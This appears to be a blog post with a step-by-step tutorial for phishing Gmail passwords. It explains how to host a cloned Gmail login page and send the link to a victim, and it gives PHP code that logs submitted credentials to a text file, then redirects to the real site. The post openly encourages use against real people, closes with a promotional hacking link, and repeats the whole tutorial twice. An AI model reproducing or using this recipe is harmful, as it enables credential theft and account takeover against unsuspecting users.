I am writing this post because many of them contacted me and said my last post about Gmail password hacking is not working.Here I am going to say the common technic for Gmail password hacking called Phishing.. Here I will be listing step by step instruction to create your own phishing page to hack gmail password.Phishing technic can be used to hack any password.For this you have to create a fake login page and have to upload it to web and send the link to victim.
Follow step by step procedure given below
If you are bigginer you can download the code below and use.
Method 1: For bigginers
Here are the steps you must follow for this to work...
1. Sign up to a free hosting service like 110mb.com,Freehostia or Ripway or anyone of your choice there are many available options for it..(I am suggesting you 110mb because I am familier with it)
2. Download the phishing page here
3. Extract it and upload them to the hosting service in the same directory (tt php gmail html).. and get the url for the gmail.html, this will be your fake page..
eg:Create a directory "hack" then upload files to there,,Now your link similar to www.username.110mb.com/hack/gmail.html
4. you are done now.. just pass the link to the victim and ask them to login.. then open the hosting site and find the file passes.txt in the directory(near to your files a text file automatically created).You will find all the variables in the Passes.txt along with the login name and the password..
eg:your password link is similar to www.username.110mb.com/hack/passes.txt
Method 2. Create Your self (Detailed method) -
1. sign up with a hosting service, to upload files.
2. Then go to the page you want to create a fake page of, say gmail.. and copy the source code into notepad.
3. Now you have to create a php script for recording all the variables that are entered in the page and storing it to a text file,copy the below php code and paste it into notepad.
header("Location: http://www.gmail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
save this with name tt.php this one is for gmail so, the url is for gmail..(you can change it) and it will record all the variables in the passes.txt
4. So now you have to link this script with the page you saved earlier..
find below code in your notepad page of gmail source(Ctrl+F to find easily)
action= id"https://www.google.com/accounts/ServiceLoginAuth" method="post"
and change it to below code
action=tt.php id="https://www.google.com/accounts/ServiceLoginAuth" method=GET
6. what you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original gmail page..
Done you hacked the gmail password...
Enjoy hacking..
If you face any problem comment below..
Follow step by step procedure given below
If you are bigginer you can download the code below and use.
Method 1: For bigginers
Here are the steps you must follow for this to work...
1. Sign up to a free hosting service like 110mb.com,Freehostia or Ripway or anyone of your choice there are many available options for it..(I am suggesting you 110mb because I am familier with it)
2. Download the phishing page here
3. Extract it and upload them to the hosting service in the same directory (tt php gmail html).. and get the url for the gmail.html, this will be your fake page..
eg:Create a directory "hack" then upload files to there,,Now your link similar to www.username.110mb.com/hack/gmail.html
4. you are done now.. just pass the link to the victim and ask them to login.. then open the hosting site and find the file passes.txt in the directory(near to your files a text file automatically created).You will find all the variables in the Passes.txt along with the login name and the password..
eg:your password link is similar to www.username.110mb.com/hack/passes.txt
Method 2. Create Your self (Detailed method) -
1. sign up with a hosting service, to upload files.
2. Then go to the page you want to create a fake page of, say gmail.. and copy the source code into notepad.
3. Now you have to create a php script for recording all the variables that are entered in the page and storing it to a text file,copy the below php code and paste it into notepad.
header("Location: http://www.gmail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
save this with name tt.php this one is for gmail so, the url is for gmail..(you can change it) and it will record all the variables in the passes.txt
4. So now you have to link this script with the page you saved earlier..
find below code in your notepad page of gmail source(Ctrl+F to find easily)
action= id"https://www.google.com/accounts/ServiceLoginAuth" method="post"
and change it to below code
action=tt.php id="https://www.google.com/accounts/ServiceLoginAuth" method=GET
6. what you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original gmail page..
Done you hacked the gmail password...
Enjoy hacking..
If you face any problem comment below..
How to Hack Gmail password....check out hack-fb-online.com